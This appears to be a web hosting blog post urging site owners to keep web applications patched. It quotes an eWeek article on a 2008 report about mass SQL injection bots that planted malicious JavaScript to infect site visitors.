We have always explained how important it is to keep your web applications up-to-date. From large forum software, to the simplest of guestlists…if the slightest update has been released for your software, you should upgrade *asap*.
Most of the web applications available today, use some sort of a “back-end” to store all the collected information and configuration. In a lot of these cases, that back-end is “SQL”.
Over the last year, SQL has been one of the more popular targets for hackers to try to cripple your website with, or take control of the various functions of the domain/server. They are able to do this mostly through various exploits that are found in web applications.
Don’t panic! This doesn’t mean, stop using the applications, and that no one is safe. What it means, is that everyone just has to keep current with what they are running, and what version they have compared to what’s available.
One thing to always keep in mind is that “if man can create it, man can break it”. Therefore, no matter who you are, there is no such thing as a perfect application. That is why you must always stay current with updates; because, the majority of such updates are patches to fix a newly found (or recently attacked) exploit.
For more information about the recent uprise in attacks, here is an article found on eWeek by
TweetSQL Attacks
Half a Million Sites Already Owned
Source:A new research report delving further into the current epidemic of online SQL injection attacks maintains that over a half million sites were victimized by the threats during 2008 alone.
According to the Web Hacking Incidents Database (WHID) 2008 Annual Report issued by security appliance maker Breach Security on Tuesday, SQL threats that dropped malware onto affected sites far outnumbered any other type of attack rearing its head on the Internet last year.
The majority of the SQL injection campaigns delivered botnet programs onto machines infected by the sites they compromised, allowing the parties behind the attacks to use the devices to a number of different ends, from distributing spam to launching additional malware threats, the company said.
“The mass SQL Injection bot payload was a script that would alter the contents of the back-end database and inject malicious JavaScript,” Breach researchers conclude in the report. “The novel approach employed by these attacks was that the SQL Injection scripts could “generically” enumerate and update the database tables all in one request.”
By cutting out a good deal of the manual research required of attackers in previous campaigns, the emergence of the “mass SQL injection bots” triggered an eruption of outbreaks, Breach maintains.
Breach Security Labs specifically tracked three major SQL-driven bots in 2008:
-Nihaorr1 Mass SQL Injection Bot
-Asprox Mass SQL Injection Bot
-Mass SQL Injection Bot EvolutionThe techniques used by the involved attackers mix together a powerful cocktail of hacking and malware authoring expertise, the experts noted.
“While the initial attack vector was SQL Injection, the overall attack more closely resembles a Cross-Site Scripting methodology as the end goal of the attack was to have malicious JavaScript execute within victim’s’ browsers. The JavaScript calls up remote malicious code that attempts to exploit various known browser flaws to install Trojans and Keyloggers in order to steal login credentials to other Web applications,” the report contends.
Breach also highlighted another “notable attack methodology shift” in the fact that rather that targeting sensitive data in site databases, the threats were largely meant to victimize site visitors.
As the firm points out, the 2008 results should serve notice that infected URLs have really and truly become the most dangerous force in the world of cybercrime.
And that SQL injection, specifically, is the manner in which most of them are being corrupted.